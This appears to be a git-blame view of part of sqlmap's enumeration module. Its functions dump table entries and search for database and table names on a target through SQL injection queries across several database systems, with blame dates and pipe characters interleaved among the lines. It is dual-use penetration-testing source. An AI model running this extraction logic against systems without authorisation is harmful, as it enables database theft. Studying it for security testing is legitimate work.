if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL):
|
2011-05-08 06:08:18 +04:00
|
|
|
table = "%s.%s" % (conf.db, tbl)
|
2010-09-01 13:25:21 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
retVal = self.__pivotDumpTable(table, colList, blind=False)
|
|
|
|
|
|
|
|
if retVal:
|
|
|
|
entries, _ = retVal
|
|
|
|
entries = zip(*[entries[colName] for colName in colList])
|
2010-05-07 17:40:57 +04:00
|
|
|
else:
|
2011-05-08 06:08:18 +04:00
|
|
|
query = rootQuery.inband.query % (colString, conf.db, tbl)
|
|
|
|
else:
|
|
|
|
query = rootQuery.inband.query % (colString, conf.db, tbl)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
if not entries and query:
|
|
|
|
entries = inject.getValue(query, blind=False, dump=True)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
if isNoneValue(entries):
|
|
|
|
entries = []
|
|
|
|
elif isinstance(entries, basestring):
|
|
|
|
entries = [ entries ]
|
|
|
|
elif not isinstance(entries, (list, tuple)):
|
|
|
|
entries = []
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
entriesCount = len(entries)
|
|
|
|
index = 0
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
for column in colList:
|
|
|
|
colLen = len(column)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
if column not in kb.data.dumpedTable:
|
|
|
|
kb.data.dumpedTable[column] = { "length": colLen, "values": [] }
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
for entry in entries:
|
|
|
|
if entry is None or len(entry) == 0:
|
|
|
|
continue
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
if isinstance(entry, basestring):
|
|
|
|
colEntry = entry
|
|
|
|
else:
|
|
|
|
colEntry = entry[index] if index < len(entry) else u''
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
colEntryLen = len(getUnicode(colEntry))
|
|
|
|
maxLen = max(colLen, colEntryLen)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
if maxLen > kb.data.dumpedTable[column]["length"]:
|
|
|
|
kb.data.dumpedTable[column]["length"] = maxLen
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
kb.data.dumpedTable[column]["values"].append(colEntry)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
index += 1
|
2011-05-08 06:08:18 +04:00
|
|
|
|
|
|
|
if not kb.data.dumpedTable and not conf.direct:
|
|
|
|
infoMsg = "fetching number of "
|
|
|
|
if conf.col:
|
2011-05-31 19:45:54 +04:00
|
|
|
infoMsg += "column(s) '%s' " % colString
|
2011-05-08 06:08:18 +04:00
|
|
|
infoMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
|
|
|
|
infoMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
if Backend.isDbms(DBMS.ORACLE):
|
|
|
|
query = rootQuery.blind.count % (tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())))
|
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
|
|
|
|
query = rootQuery.blind.count % tbl
|
2011-04-08 19:17:57 +04:00
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL):
|
2011-05-08 06:08:18 +04:00
|
|
|
query = rootQuery.blind.count % ("%s.%s" % (conf.db, tbl))
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.MAXDB):
|
2011-05-08 06:08:18 +04:00
|
|
|
query = rootQuery.blind.count % tbl
|
|
|
|
else:
|
|
|
|
query = rootQuery.blind.count % (conf.db, tbl)
|
|
|
|
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)
|
2011-04-15 01:11:20 +04:00
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
lengths = {}
|
|
|
|
entries = {}
|
|
|
|
|
|
|
|
if count == "0":
|
|
|
|
warnMsg = "table '%s' " % unsafeSQLIdentificatorNaming(tbl)
|
|
|
|
warnMsg += "on database '%s' " % unsafeSQLIdentificatorNaming(conf.db)
|
|
|
|
warnMsg += "appears to be empty"
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
for column in colList:
|
|
|
|
lengths[column] = len(column)
|
|
|
|
entries[column] = []
|
|
|
|
|
|
|
|
elif not isNumPosStrValue(count):
|
2011-05-08 06:08:18 +04:00
|
|
|
warnMsg = "unable to retrieve the number of "
|
|
|
|
if conf.col:
|
|
|
|
warnMsg += "columns '%s' " % colString
|
|
|
|
warnMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
|
|
|
|
warnMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
continue
|
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.SYBASE, DBMS.MAXDB, DBMS.MSSQL):
|
2011-05-08 06:08:18 +04:00
|
|
|
if Backend.isDbms(DBMS.ACCESS):
|
|
|
|
table = tbl
|
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL):
|
|
|
|
table = "%s.%s" % (conf.db, tbl)
|
|
|
|
elif Backend.isDbms(DBMS.MAXDB):
|
|
|
|
table = "%s.%s" % (conf.db, tbl)
|
|
|
|
|
|
|
|
retVal = self.__pivotDumpTable(table, colList, count, blind=True)
|
|
|
|
if retVal:
|
|
|
|
entries, lengths = retVal
|
2011-01-01 15:41:51 +03:00
|
|
|
|
2011-02-19 12:36:57 +03:00
|
|
|
else:
|
2011-05-08 06:08:18 +04:00
|
|
|
if Backend.isDbms(DBMS.ORACLE):
|
|
|
|
plusOne = True
|
|
|
|
else:
|
|
|
|
plusOne = False
|
|
|
|
indexRange = getRange(count, dump=True, plusOne=plusOne)
|
2011-02-19 12:36:57 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
for index in indexRange:
|
|
|
|
for column in colList:
|
|
|
|
if column not in lengths:
|
|
|
|
lengths[column] = 0
|
|
|
|
|
|
|
|
if column not in entries:
|
|
|
|
entries[column] = []
|
|
|
|
|
|
|
|
if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
|
|
|
|
query = rootQuery.blind.query % (column, conf.db,
|
|
|
|
conf.tbl, index)
|
|
|
|
elif Backend.isDbms(DBMS.ORACLE):
|
|
|
|
query = rootQuery.blind.query % (column, column,
|
|
|
|
tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())),
|
|
|
|
index)
|
|
|
|
elif Backend.isDbms(DBMS.SQLITE):
|
|
|
|
query = rootQuery.blind.query % (column, tbl, index)
|
|
|
|
|
|
|
|
elif Backend.isDbms(DBMS.FIREBIRD):
|
|
|
|
query = rootQuery.blind.query % (index, column, tbl)
|
|
|
|
|
|
|
|
value = inject.getValue(query, inband=False, error=False, dump=True)
|
2011-01-01 15:41:51 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
lengths[column] = max(lengths[column], len(value) if value else 0)
|
|
|
|
entries[column].append(value)
|
2011-01-01 15:41:51 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
for column, columnEntries in entries.items():
|
|
|
|
length = max(lengths[column], len(column))
|
2011-01-01 15:41:51 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
kb.data.dumpedTable[column] = { "length": length,
|
|
|
|
"values": columnEntries }
|
2011-01-01 15:41:51 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
entriesCount = len(columnEntries)
|
|
|
|
|
|
|
|
if len(kb.data.dumpedTable) > 0:
|
|
|
|
kb.data.dumpedTable["__infos__"] = { "count": entriesCount,
|
|
|
|
"table": unsafeSQLIdentificatorNaming(tbl),
|
|
|
|
"db": unsafeSQLIdentificatorNaming(conf.db) }
|
|
|
|
|
2011-05-10 19:48:48 +04:00
|
|
|
attackDumpedTable()
|
2011-05-08 06:08:18 +04:00
|
|
|
conf.dumper.dbTableValues(kb.data.dumpedTable)
|
|
|
|
else:
|
|
|
|
warnMsg = "unable to retrieve the entries of "
|
|
|
|
if conf.col:
|
|
|
|
warnMsg += "columns '%s' " % colString
|
|
|
|
warnMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
|
|
|
|
warnMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
|
|
|
|
logger.warn(warnMsg)
|
2011-01-01 15:41:51 +03:00
|
|
|
|
|
|
|
except KeyboardInterrupt:
|
|
|
|
warnMsg = "Ctrl+C detected in dumping phase"
|
|
|
|
logger.warn(warnMsg)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-01-04 16:23:59 +03:00
|
|
|
except sqlmapConnectionException, e:
|
|
|
|
errMsg = "connection exception detected in dumping phase: "
|
|
|
|
errMsg += "'%s'" % e
|
|
|
|
logger.critical(errMsg)
|
|
|
|
|
2010-05-07 17:40:57 +04:00
|
|
|
def dumpAll(self):
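# Dumps the entries of every table of every enumerable database by
# iterating over kb.data.cachedTables and calling self.dumpTable() for each
# table, skipping tables that raise sqlmapNoneDataException.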
|
2011-05-08 06:08:18 +04:00
|
|
|
if conf.db is not None and conf.tbl is None:
|
|
|
|
self.dumpTable()
|
|
|
|
return
|
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2011-04-30 17:20:05 +04:00
|
|
|
errMsg = "information_schema not available, "
|
2010-01-09 03:05:00 +03:00
|
|
|
errMsg += "back-end DBMS is MySQL < 5.0"
|
|
|
|
raise sqlmapUnsupportedFeatureException, errMsg
|
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
infoMsg = "sqlmap will dump entries of all databases' tables now"
|
|
|
|
logger.info(infoMsg)
|
2011-04-08 02:08:10 +04:00
|
|
|
|
2011-04-30 17:20:05 +04:00
|
|
|
conf.tbl = None
|
|
|
|
conf.col = None
|
2011-05-08 06:08:18 +04:00
|
|
|
|
2011-04-30 19:29:19 +04:00
|
|
|
self.getTables()
|
2010-12-21 13:31:56 +03:00
|
|
|
|
2010-11-05 01:00:14 +03:00
|
|
|
if kb.data.cachedTables:
|
|
|
|
if isinstance(kb.data.cachedTables, list):
|
|
|
|
kb.data.cachedTables = { None : kb.data.cachedTables }
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2010-11-05 01:00:14 +03:00
|
|
|
for db, tables in kb.data.cachedTables.items():
|
|
|
|
conf.db = db
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2010-11-05 01:00:14 +03:00
|
|
|
for table in tables:
|
2011-04-15 00:56:12 +04:00
|
|
|
try:
|
|
|
|
conf.tbl = table
|
|
|
|
kb.data.cachedColumns = {}
|
|
|
|
kb.data.dumpedTable = {}
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 14:25:40 +04:00
|
|
|
self.dumpTable()
|
2011-04-15 00:56:12 +04:00
|
|
|
except sqlmapNoneDataException:
|
|
|
|
infoMsg = "skipping table '%s'" % table
|
|
|
|
logger.info(infoMsg)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
def dumpFoundColumn(self, dbs, foundCols, colConsider):
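# Given the databases/tables found to contain the searched column(s),
# interactively asks which databases and which of their tables to dump and
# dumps the selected ones via self.dumpTable().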
|
|
|
|
if not dbs:
|
|
|
|
warnMsg = "no databases have tables containing any of the "
|
|
|
|
warnMsg += "provided columns"
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
return
|
|
|
|
|
2010-05-28 20:43:04 +04:00
|
|
|
conf.dumper.dbColumns(foundCols, colConsider, dbs)
|
2010-05-17 20:16:49 +04:00
|
|
|
|
|
|
|
message = "do you want to dump entries? [Y/n] "
|
|
|
|
output = readInput(message, default="Y")
|
|
|
|
|
|
|
|
if output and output[0] not in ("y", "Y"):
|
|
|
|
return
|
|
|
|
|
|
|
|
dumpFromDbs = []
|
|
|
|
message = "which database(s)?\n[a]ll (default)\n"
|
|
|
|
|
|
|
|
for db, tblData in dbs.items():
|
|
|
|
if tblData:
|
|
|
|
message += "[%s]\n" % db
|
|
|
|
|
|
|
|
message += "[q]uit"
|
|
|
|
test = readInput(message, default="a")
|
|
|
|
|
|
|
|
if not test or test in ("a", "A"):
|
|
|
|
dumpFromDbs = dbs.keys()
|
|
|
|
elif test in ("q", "Q"):
|
|
|
|
return
|
|
|
|
else:
|
|
|
|
dumpFromDbs = test.replace(" ", "").split(",")
|
|
|
|
|
|
|
|
for db, tblData in dbs.items():
|
|
|
|
if db not in dumpFromDbs or not tblData:
|
|
|
|
continue
|
|
|
|
|
|
|
|
conf.db = db
|
|
|
|
dumpFromTbls = []
|
|
|
|
message = "which table(s) of database '%s'?\n" % db
|
|
|
|
message += "[a]ll (default)\n"
|
|
|
|
|
|
|
|
for tbl in tblData:
|
|
|
|
message += "[%s]\n" % tbl
|
|
|
|
|
|
|
|
message += "[s]kip\n"
|
|
|
|
message += "[q]uit"
|
|
|
|
test = readInput(message, default="a")
|
|
|
|
|
|
|
|
if not test or test in ("a", "A"):
|
|
|
|
dumpFromTbls = tblData
|
|
|
|
elif test in ("s", "S"):
|
|
|
|
continue
|
|
|
|
elif test in ("q", "Q"):
|
|
|
|
return
|
|
|
|
else:
|
|
|
|
dumpFromTbls = test.replace(" ", "").split(",")
|
|
|
|
|
|
|
|
for table, columns in tblData.items():
|
|
|
|
if table not in dumpFromTbls:
|
|
|
|
continue
|
|
|
|
|
|
|
|
conf.tbl = table
|
|
|
|
conf.col = ",".join(column for column in columns)
|
|
|
|
kb.data.cachedColumns = {}
|
|
|
|
kb.data.dumpedTable = {}
|
|
|
|
|
|
|
|
data = self.dumpTable()
|
|
|
|
|
|
|
|
if data:
|
2010-05-28 20:43:04 +04:00
|
|
|
conf.dumper.dbTableValues(data)
|
2010-05-17 20:16:49 +04:00
|
|
|
|
2010-05-07 17:40:57 +04:00
|
|
|
def searchDb(self):
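# Searches for database names matching the value(s) given with -D (LIKE or
# exact match, depending on user choice), using inband/error techniques
# when available and blind retrieval otherwise; returns the list of found
# databases.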
|
|
|
|
foundDbs = []
|
2011-01-28 19:36:09 +03:00
|
|
|
rootQuery = queries[Backend.getIdentifiedDbms()].search_db
|
2010-05-07 17:40:57 +04:00
|
|
|
dbList = conf.db.split(",")
|
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2010-10-21 17:13:12 +04:00
|
|
|
dbCond = rootQuery.inband.condition2
|
2010-05-07 17:40:57 +04:00
|
|
|
else:
|
2010-10-21 17:13:12 +04:00
|
|
|
dbCond = rootQuery.inband.condition
|
2010-05-07 17:40:57 +04:00
|
|
|
|
|
|
|
dbConsider, dbCondParam = self.likeOrExact("database")
|
|
|
|
|
|
|
|
for db in dbList:
|
2011-03-30 01:54:15 +04:00
|
|
|
db = safeSQLIdentificatorNaming(db)
|
2011-03-28 15:01:55 +04:00
|
|
|
|
2010-05-07 17:40:57 +04:00
|
|
|
infoMsg = "searching database"
|
|
|
|
if dbConsider == "1":
|
|
|
|
infoMsg += "s like"
|
2011-03-30 01:54:15 +04:00
|
|
|
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db)
|
2010-05-07 17:40:57 +04:00
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
if conf.excludeSysDbs:
|
2011-03-30 01:54:15 +04:00
|
|
|
exclDbsQuery = "".join(" AND '%s' != %s" % (unsafeSQLIdentificatorNaming(db), dbCond) for db in self.excludeDbsList)
|
2011-04-30 19:29:19 +04:00
|
|
|
infoMsg = "skipping system database%s: %s" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList))
|
2010-05-07 17:40:57 +04:00
|
|
|
logger.info(infoMsg)
|
|
|
|
else:
|
|
|
|
exclDbsQuery = ""
|
|
|
|
|
|
|
|
dbQuery = "%s%s" % (dbCond, dbCondParam)
|
2011-03-30 01:54:15 +04:00
|
|
|
dbQuery = dbQuery % unsafeSQLIdentificatorNaming(db)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-01-19 02:02:11 +03:00
|
|
|
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.inband.query2
|
2010-05-07 17:40:57 +04:00
|
|
|
else:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.inband.query
|
2010-05-07 17:40:57 +04:00
|
|
|
query += dbQuery
|
|
|
|
query += exclDbsQuery
|
2011-01-19 02:02:11 +03:00
|
|
|
values = inject.getValue(query, blind=False)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-26 12:17:21 +04:00
|
|
|
if not isNoneValue(values):
|
2010-05-25 14:09:35 +04:00
|
|
|
if isinstance(values, basestring):
|
2010-05-07 17:40:57 +04:00
|
|
|
values = [ values ]
|
|
|
|
|
|
|
|
for value in values:
|
2011-03-30 01:54:15 +04:00
|
|
|
value = safeSQLIdentificatorNaming(value)
|
2010-05-07 17:40:57 +04:00
|
|
|
foundDbs.append(value)
|
|
|
|
else:
|
|
|
|
infoMsg = "fetching number of databases"
|
|
|
|
if dbConsider == "1":
|
|
|
|
infoMsg += "s like"
|
2011-03-30 01:54:15 +04:00
|
|
|
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db)
|
2010-05-07 17:40:57 +04:00
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.count2
|
2010-05-07 17:40:57 +04:00
|
|
|
else:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.count
|
2010-05-07 17:40:57 +04:00
|
|
|
query += dbQuery
|
|
|
|
query += exclDbsQuery
|
2011-01-19 02:02:11 +03:00
|
|
|
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2010-12-02 21:57:43 +03:00
|
|
|
if not isNumPosStrValue(count):
|
2011-04-30 17:20:05 +04:00
|
|
|
warnMsg = "no database"
|
2010-05-07 17:40:57 +04:00
|
|
|
if dbConsider == "1":
|
|
|
|
warnMsg += "s like"
|
2011-03-30 01:54:15 +04:00
|
|
|
warnMsg += " '%s' found" % unsafeSQLIdentificatorNaming(db)
|
2010-05-07 17:40:57 +04:00
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
continue
|
|
|
|
|
|
|
|
indexRange = getRange(count)
|
|
|
|
|
|
|
|
for index in indexRange:
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.query2
|
2010-05-07 17:40:57 +04:00
|
|
|
else:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.query
|
2010-05-07 17:40:57 +04:00
|
|
|
query += dbQuery
|
|
|
|
query += exclDbsQuery
|
|
|
|
query = agent.limitQuery(index, query, dbCond)
|
|
|
|
|
2011-03-28 15:01:55 +04:00
|
|
|
value = inject.getValue(query, inband=False, error=False)
|
2011-03-30 01:54:15 +04:00
|
|
|
value = safeSQLIdentificatorNaming(value)
|
2011-03-28 15:01:55 +04:00
|
|
|
foundDbs.append(value)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
|
|
|
return foundDbs
|
|
|
|
|
|
|
|
def searchTable(self):
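# Searches across all databases for tables matching the value(s) given with
# -T; falls back to the common-tables brute-force check when
# information_schema is not available (MySQL < 5.0) or the back-end is
# Access. Returns a dictionary mapping databases to the tables found.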
|
2010-12-27 02:50:16 +03:00
|
|
|
bruteForce = False
|
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2011-04-30 17:20:05 +04:00
|
|
|
errMsg = "information_schema not available, "
|
2010-05-17 00:46:17 +04:00
|
|
|
errMsg += "back-end DBMS is MySQL < 5.0"
|
2010-12-27 02:50:16 +03:00
|
|
|
bruteForce = True
|
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.ACCESS):
|
2011-04-30 17:20:05 +04:00
|
|
|
errMsg = "cannot retrieve table names, "
|
2010-12-27 02:50:16 +03:00
|
|
|
errMsg += "back-end DBMS is Access"
|
|
|
|
logger.error(errMsg)
|
|
|
|
bruteForce = True
|
|
|
|
|
|
|
|
if bruteForce:
|
2011-05-22 12:24:13 +04:00
|
|
|
message = "do you want to use common table existence check? [Y/n/q]"
|
2010-12-27 02:50:16 +03:00
|
|
|
test = readInput(message, default="Y")
|
|
|
|
|
|
|
|
if test[0] in ("n", "N"):
|
|
|
|
return
|
|
|
|
elif test[0] in ("q", "Q"):
|
|
|
|
raise sqlmapUserQuitException
|
|
|
|
else:
|
|
|
|
regex = "|".join(conf.tbl.split(","))
|
|
|
|
return tableExists(paths.COMMON_TABLES, regex)
|
2010-05-17 00:46:17 +04:00
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
rootQuery = queries[Backend.getIdentifiedDbms()].search_table
|
2010-05-17 00:46:17 +04:00
|
|
|
foundTbls = {}
|
|
|
|
tblList = conf.tbl.split(",")
|
2010-10-21 17:13:12 +04:00
|
|
|
tblCond = rootQuery.inband.condition
|
|
|
|
dbCond = rootQuery.inband.condition2
|
2010-05-17 00:46:17 +04:00
|
|
|
|
|
|
|
tblConsider, tblCondParam = self.likeOrExact("table")
|
|
|
|
|
|
|
|
for tbl in tblList:
|
2011-03-30 01:54:15 +04:00
|
|
|
tbl = safeSQLIdentificatorNaming(tbl, True)
|
2011-03-28 15:01:55 +04:00
|
|
|
|
2011-05-06 14:27:43 +04:00
|
|
|
if Backend.isDbms(DBMS.ORACLE):
|
2010-05-17 00:46:17 +04:00
|
|
|
tbl = tbl.upper()
|
|
|
|
|
|
|
|
infoMsg = "searching table"
|
|
|
|
if tblConsider == "1":
|
|
|
|
infoMsg += "s like"
|
2011-03-30 01:54:15 +04:00
|
|
|
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl)
|
2010-05-17 00:46:17 +04:00
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
if conf.excludeSysDbs:
|
2011-03-30 01:54:15 +04:00
|
|
|
exclDbsQuery = "".join(" AND '%s' != %s" % (unsafeSQLIdentificatorNaming(db), dbCond) for db in self.excludeDbsList)
|
2011-04-30 19:29:19 +04:00
|
|
|
infoMsg = "skipping system database%s: %s" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList))
|
2010-05-17 00:46:17 +04:00
|
|
|
logger.info(infoMsg)
|
|
|
|
else:
|
|
|
|
exclDbsQuery = ""
|
|
|
|
|
|
|
|
tblQuery = "%s%s" % (tblCond, tblCondParam)
|
|
|
|
tblQuery = tblQuery % tbl
|
|
|
|
|
2011-01-19 02:02:11 +03:00
|
|
|
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.inband.query
|
2010-05-17 00:46:17 +04:00
|
|
|
query += tblQuery
|
|
|
|
query += exclDbsQuery
|
2011-01-19 02:02:11 +03:00
|
|
|
values = inject.getValue(query, blind=False)
|
2010-05-17 00:46:17 +04:00
|
|
|
|
2011-05-26 12:17:21 +04:00
|
|
|
if not isNoneValue(values):
|
2010-05-25 14:09:35 +04:00
|
|
|
if isinstance(values, basestring):
|
2010-05-17 00:46:17 +04:00
|
|
|
values = [ values ]
|
|
|
|
|
|
|
|
for foundDb, foundTbl in values:
|
2011-03-30 01:54:15 +04:00
|
|
|
foundDb = safeSQLIdentificatorNaming(foundDb)
|
|
|
|
foundTbl = safeSQLIdentificatorNaming(foundTbl, True)
|
2011-03-28 15:01:55 +04:00
|
|
|
|
2011-02-10 14:34:16 +03:00
|
|
|
if foundDb is None or foundTbl is None:
|
|
|
|
continue
|
|
|
|
|
2010-05-17 00:46:17 +04:00
|
|
|
if foundDb in foundTbls:
|
|
|
|
foundTbls[foundDb].append(foundTbl)
|
|
|
|
else:
|
|
|
|
foundTbls[foundDb] = [ foundTbl ]
|
|
|
|
else:
|
|
|
|
infoMsg = "fetching number of databases with table"
|
|
|
|
if tblConsider == "1":
|
|
|
|
infoMsg += "s like"
|
2011-03-30 01:54:15 +04:00
|
|
|
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl)
|
2010-05-17 00:46:17 +04:00
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.count
|
2010-05-17 00:46:17 +04:00
|
|
|
query += tblQuery
|
|
|
|
query += exclDbsQuery
|
2011-01-19 02:02:11 +03:00
|
|
|
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)
|
2010-05-17 00:46:17 +04:00
|
|
|
|
2010-12-02 21:57:43 +03:00
|
|
|
if not isNumPosStrValue(count):
|
2011-04-30 17:20:05 +04:00
|
|
|
warnMsg = "no databases have table"
|
2010-05-17 00:46:17 +04:00
|
|
|
if tblConsider == "1":
|
|
|
|
warnMsg += "s like"
|
2011-03-30 01:54:15 +04:00
|
|
|
warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl)
|
2010-05-17 00:46:17 +04:00
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
continue
|
|
|
|
|
|
|
|
indexRange = getRange(count)
|
|
|
|
|
|
|
|
for index in indexRange:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.query
|
2010-05-17 00:46:17 +04:00
|
|
|
query += tblQuery
|
|
|
|
query += exclDbsQuery
|
|
|
|
query = agent.limitQuery(index, query)
|
2011-01-19 02:02:11 +03:00
|
|
|
foundDb = inject.getValue(query, inband=False, error=False)
|
2011-03-30 01:54:15 +04:00
|
|
|
foundDb = safeSQLIdentificatorNaming(foundDb)
|
2011-02-10 14:34:16 +03:00
|
|
|
|
2011-01-02 15:23:36 +03:00
|
|
|
if foundDb not in foundTbls:
|
|
|
|
foundTbls[foundDb] = []
|
2010-05-17 00:46:17 +04:00
|
|
|
|
|
|
|
if tblConsider == "2":
|
|
|
|
foundTbls[foundDb].append(tbl)
|
|
|
|
|
|
|
|
if tblConsider == "2":
|
|
|
|
continue
|
|
|
|
|
|
|
|
for db in foundTbls.keys():
|
2011-03-30 01:54:15 +04:00
|
|
|
db = safeSQLIdentificatorNaming(db)
|
2011-03-28 15:01:55 +04:00
|
|
|
|
2010-05-17 00:46:17 +04:00
|
|
|
infoMsg = "fetching number of table"
|
|
|
|
if tblConsider == "1":
|
|
|
|
infoMsg += "s like"
|
2011-03-30 01:54:15 +04:00
|
|
|
infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), db)
|
2010-05-17 00:46:17 +04:00
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.count2
|
2011-03-30 01:54:15 +04:00
|
|
|
query = query % unsafeSQLIdentificatorNaming(db)
|
2010-05-17 00:46:17 +04:00
|
|
|
query += " AND %s" % tblQuery
|
2011-01-19 02:02:11 +03:00
|
|
|
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)
|
2010-05-17 00:46:17 +04:00
|
|
|
|
2010-12-02 21:57:43 +03:00
|
|
|
if not isNumPosStrValue(count):
|
2010-05-17 00:46:17 +04:00
|
|
|
warnMsg = "no table"
|
|
|
|
if tblConsider == "1":
|
|
|
|
warnMsg += "s like"
|
2011-03-30 01:54:15 +04:00
|
|
|
warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(tbl)
|
2010-05-17 00:46:17 +04:00
|
|
|
warnMsg += "in database '%s'" % db
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
continue
|
|
|
|
|
|
|
|
indexRange = getRange(count)
|
|
|
|
|
|
|
|
for index in indexRange:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.query2
|
2011-03-30 01:54:15 +04:00
|
|
|
query = query % unsafeSQLIdentificatorNaming(db)
|
2010-05-17 00:46:17 +04:00
|
|
|
query += " AND %s" % tblQuery
|
|
|
|
query = agent.limitQuery(index, query)
|
